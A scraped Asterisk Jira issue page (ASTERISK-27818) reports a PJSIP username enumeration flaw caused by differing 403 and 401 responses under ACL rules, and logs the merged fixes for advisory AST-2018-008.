Asterisk
  1. Asterisk
  2. ASTERISK-27818

Username bruteforce is possible when using ACL with PJSIP

    Details

    • PJSIP Bundled:
      Yes

      Description

      When ACL rules block registration they respond with a 403 Forbidden when the username matches and with 401 Unauthorized when the username does not match.

      This essentially allows someone to constantly test usernames and see which ones are valid and which ones are not.

      I've only encountered this problem on my setup working with Realtime. Not sure what else is effected.

      1. AST-2018-008.pdf
        45 kB
        Richard Mudgett
      2. jira_asterisk_27818_v13.patch
        3 kB
        Richard Mudgett

        Issue Links

        No reviews matched the request. Check your Options in the drop-down menu of this sections header.

          Activity

          Hide
          Friendly Automation added a comment -

          Change 9157 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9157

          Show
          Friendly Automation added a comment - Change 9157 merged by Kevin Harwell: AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses. https://gerrit.asterisk.org/9157
          Hide
          Friendly Automation added a comment -

          Change 9156 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9156

          Show
          Friendly Automation added a comment - Change 9156 merged by Kevin Harwell: AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses. https://gerrit.asterisk.org/9156
          Hide
          Friendly Automation added a comment -

          Change 9154 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9154

          Show
          Friendly Automation added a comment - Change 9154 merged by Kevin Harwell: AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses. https://gerrit.asterisk.org/9154
          Hide
          Friendly Automation added a comment -

          Change 9173 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9173

          Show
          Friendly Automation added a comment - Change 9173 merged by Kevin Harwell: AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses. https://gerrit.asterisk.org/9173
          Hide
          Friendly Automation added a comment -

          Change 9172 merged by Kevin Harwell:
          AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses.

          https://gerrit.asterisk.org/9172

          Show
          Friendly Automation added a comment - Change 9172 merged by Kevin Harwell: AST-2018-008: Fix enumeration of endpoints from ACL rejected addresses. https://gerrit.asterisk.org/9172

            People

            • Watchers:
              4 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: